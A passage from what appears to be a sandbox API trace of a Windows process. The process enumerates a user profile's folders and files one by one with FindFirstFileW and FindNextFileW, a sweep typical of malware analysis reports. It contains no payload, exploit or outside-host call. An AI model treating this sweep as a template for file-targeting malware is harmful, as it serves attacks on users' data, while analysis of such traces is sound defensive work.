hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712e73e0, ftCreationTime.dwHighDateTime=0x1d5c399, ftLastAccessTime.dwLowDateTime=0xe54abd60, ftLastAccessTime.dwHighDateTime=0x1d5c2fe, ftLastWriteTime.dwLowDateTime=0xe54abd60, ftLastWriteTime.dwHighDateTime=0x1d5c2fe, nFileSizeHigh=0x0, nFileSizeLow=0xecb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MMJjf08EkmSTh.m4a", cAlternateFileName="MMJJF0~1.M4A")) returned 1 [0228.779] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd2ea1a0, ftCreationTime.dwHighDateTime=0x1d5bfea, ftLastAccessTime.dwLowDateTime=0xb4eea080, ftLastAccessTime.dwHighDateTime=0x1d5c5f3, ftLastWriteTime.dwLowDateTime=0xb4eea080, ftLastWriteTime.dwHighDateTime=0x1d5c5f3, nFileSizeHigh=0x0, nFileSizeLow=0xfb0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sT-eqZP_KQzCD.wav", cAlternateFileName="ST-EQZ~1.WAV")) returned 1 [0228.779] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe28078d0, ftCreationTime.dwHighDateTime=0x1d5bbb6, ftLastAccessTime.dwLowDateTime=0xb4184e80, ftLastAccessTime.dwHighDateTime=0x1d5bdc0, ftLastWriteTime.dwLowDateTime=0xb4184e80, ftLastWriteTime.dwHighDateTime=0x1d5bdc0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZmlmXoAngk", cAlternateFileName="ZMLMXO~1")) returned 1 [0228.779] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447f02e0, ftCreationTime.dwHighDateTime=0x1d5b649, ftLastAccessTime.dwLowDateTime=0x13b4b140, ftLastAccessTime.dwHighDateTime=0x1d5b9f6, ftLastWriteTime.dwLowDateTime=0x13b4b140, ftLastWriteTime.dwHighDateTime=0x1d5b9f6, nFileSizeHigh=0x0, nFileSizeLow=0x16758, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZqB0wDY39.mp3", cAlternateFileName="ZQB0WD~1.MP3")) returned 1 [0228.779] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447f02e0, ftCreationTime.dwHighDateTime=0x1d5b649, ftLastAccessTime.dwLowDateTime=0x13b4b140, ftLastAccessTime.dwHighDateTime=0x1d5b9f6, ftLastWriteTime.dwLowDateTime=0x13b4b140, ftLastWriteTime.dwHighDateTime=0x1d5b9f6, nFileSizeHigh=0x0, nFileSizeLow=0x16758, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZqB0wDY39.mp3", cAlternateFileName="ZQB0WD~1.MP3")) returned 0 [0228.779] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e30 | out: hHeap=0x620000) returned 1 [0228.780] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.780] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0228.780] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.780] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.780] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.780] PathFindFileNameW (pszPath="") returned="" [0228.780] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447f02e0, ftCreationTime.dwHighDateTime=0x1d5b649, ftLastAccessTime.dwLowDateTime=0x13b4b140, ftLastAccessTime.dwHighDateTime=0x1d5b9f6, ftLastWriteTime.dwLowDateTime=0x13b4b140, ftLastWriteTime.dwHighDateTime=0x1d5b9f6, nFileSizeHigh=0x0, nFileSizeLow=0x16758, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZqB0wDY39.mp3", cAlternateFileName="ZQB0WD~1.MP3")) returned 0xffffffff [0228.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bf80 | out: hHeap=0x620000) returned 1 [0228.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bbd8 | out: hHeap=0x620000) returned 1 [0228.780] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.780] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0228.780] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.780] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.780] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.780] PathFindFileNameW (pszPath="") returned="" [0228.780] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447f02e0, ftCreationTime.dwHighDateTime=0x1d5b649, ftLastAccessTime.dwLowDateTime=0x13b4b140, ftLastAccessTime.dwHighDateTime=0x1d5b9f6, ftLastWriteTime.dwLowDateTime=0x13b4b140, ftLastWriteTime.dwHighDateTime=0x1d5b9f6, nFileSizeHigh=0x0, nFileSizeLow=0x16758, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZqB0wDY39.mp3", cAlternateFileName="ZQB0WD~1.MP3")) returned 0xffffffff [0228.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e88 | out: hHeap=0x620000) returned 1 [0228.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e30 | out: hHeap=0x620000) returned 1 [0228.781] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.781] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0228.781] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.781] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.781] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.781] PathFindFileNameW (pszPath="") returned="" [0228.781] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa3afcdf0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa3afcdf0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bbd8 | out: hHeap=0x620000) returned 1 [0228.781] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa3afcdf0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa3afcdf0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.781] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeab9eb60, ftCreationTime.dwHighDateTime=0x1d5c531, ftLastAccessTime.dwLowDateTime=0x38ed7b0, ftLastAccessTime.dwHighDateTime=0x1d5c46d, ftLastWriteTime.dwLowDateTime=0x38ed7b0, ftLastWriteTime.dwHighDateTime=0x1d5c46d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2DVGfW2 wBKbSvaIoJ2e", cAlternateFileName="2DVGFW~1")) returned 1 [0228.781] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0228.781] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88ef9110, ftCreationTime.dwHighDateTime=0x1d5c125, ftLastAccessTime.dwLowDateTime=0xcb9a5d30, ftLastAccessTime.dwHighDateTime=0x1d5c41b, ftLastWriteTime.dwLowDateTime=0xcb9a5d30, ftLastWriteTime.dwHighDateTime=0x1d5c41b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lVTDtn H8OPDt", cAlternateFileName="LVTDTN~1")) returned 1 [0228.781] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5649ad30, ftCreationTime.dwHighDateTime=0x1d5bfe6, ftLastAccessTime.dwLowDateTime=0xe7e45550, ftLastAccessTime.dwHighDateTime=0x1d5c190, ftLastWriteTime.dwLowDateTime=0xe7e45550, ftLastWriteTime.dwHighDateTime=0x1d5c190, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NkpM1m8S", cAlternateFileName="")) returned 1 [0228.781] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14bcb600, ftCreationTime.dwHighDateTime=0x1d5c568, ftLastAccessTime.dwLowDateTime=0xf3e32010, ftLastAccessTime.dwHighDateTime=0x1d5bde0, ftLastWriteTime.dwLowDateTime=0xf3e32010, ftLastWriteTime.dwHighDateTime=0x1d5bde0, nFileSizeHigh=0x0, nFileSizeLow=0x168dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rl2ShyOqa7QJpEjNG.png", cAlternateFileName="RL2SHY~1.PNG")) returned 1 [0228.781] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14bcb600, ftCreationTime.dwHighDateTime=0x1d5c568, ftLastAccessTime.dwLowDateTime=0xf3e32010, ftLastAccessTime.dwHighDateTime=0x1d5bde0, ftLastWriteTime.dwLowDateTime=0xf3e32010, ftLastWriteTime.dwHighDateTime=0x1d5bde0, nFileSizeHigh=0x0, nFileSizeLow=0x168dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rl2ShyOqa7QJpEjNG.png", cAlternateFileName="RL2SHY~1.PNG")) returned 0 [0228.782] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e30 | out: hHeap=0x620000) returned 1 [0228.782] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.782] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0228.782] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.782] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.782] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.782] PathFindFileNameW (pszPath="") returned="" [0228.782] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14bcb600, ftCreationTime.dwHighDateTime=0x1d5c568, ftLastAccessTime.dwLowDateTime=0xf3e32010, ftLastAccessTime.dwHighDateTime=0x1d5bde0, ftLastWriteTime.dwLowDateTime=0xf3e32010, ftLastWriteTime.dwHighDateTime=0x1d5bde0, nFileSizeHigh=0x0, nFileSizeLow=0x168dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rl2ShyOqa7QJpEjNG.png", cAlternateFileName="RL2SHY~1.PNG")) returned 0xffffffff [0228.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bf80 | out: hHeap=0x620000) returned 1 [0228.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bbd8 | out: hHeap=0x620000) returned 1 [0228.783] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.783] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0228.783] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.783] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.783] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.783] PathFindFileNameW (pszPath="") returned="" [0228.783] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14bcb600, ftCreationTime.dwHighDateTime=0x1d5c568, ftLastAccessTime.dwLowDateTime=0xf3e32010, ftLastAccessTime.dwHighDateTime=0x1d5bde0, ftLastWriteTime.dwLowDateTime=0xf3e32010, ftLastWriteTime.dwHighDateTime=0x1d5bde0, nFileSizeHigh=0x0, nFileSizeLow=0x168dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rl2ShyOqa7QJpEjNG.png", cAlternateFileName="RL2SHY~1.PNG")) returned 0xffffffff [0228.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e88 | out: hHeap=0x620000) returned 1 [0228.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e30 | out: hHeap=0x620000) returned 1 [0228.783] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.783] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0228.783] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.783] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.783] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.783] PathFindFileNameW (pszPath="") returned="" [0228.783] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bf80 | out: hHeap=0x620000) returned 1 [0228.784] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.784] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0228.784] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0228.784] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bbd8 | out: hHeap=0x620000) returned 1 [0228.784] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.784] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0228.784] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.784] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.784] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.784] PathFindFileNameW (pszPath="") returned="" [0228.785] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bbd8 | out: hHeap=0x620000) returned 1 [0228.785] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.785] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0228.785] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0228.785] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0228.785] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0228.785] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e30 | out: hHeap=0x620000) returned 1 [0228.785] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.785] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0228.785] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.785] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.786] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.786] PathFindFileNameW (pszPath="") returned="" [0228.786] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0228.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e88 | out: hHeap=0x620000) returned 1 [0228.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e30 | out: hHeap=0x620000) returned 1 [0228.786] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.786] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0228.786] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.786] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.786] HeapFree (in: hHeap=0x620000, 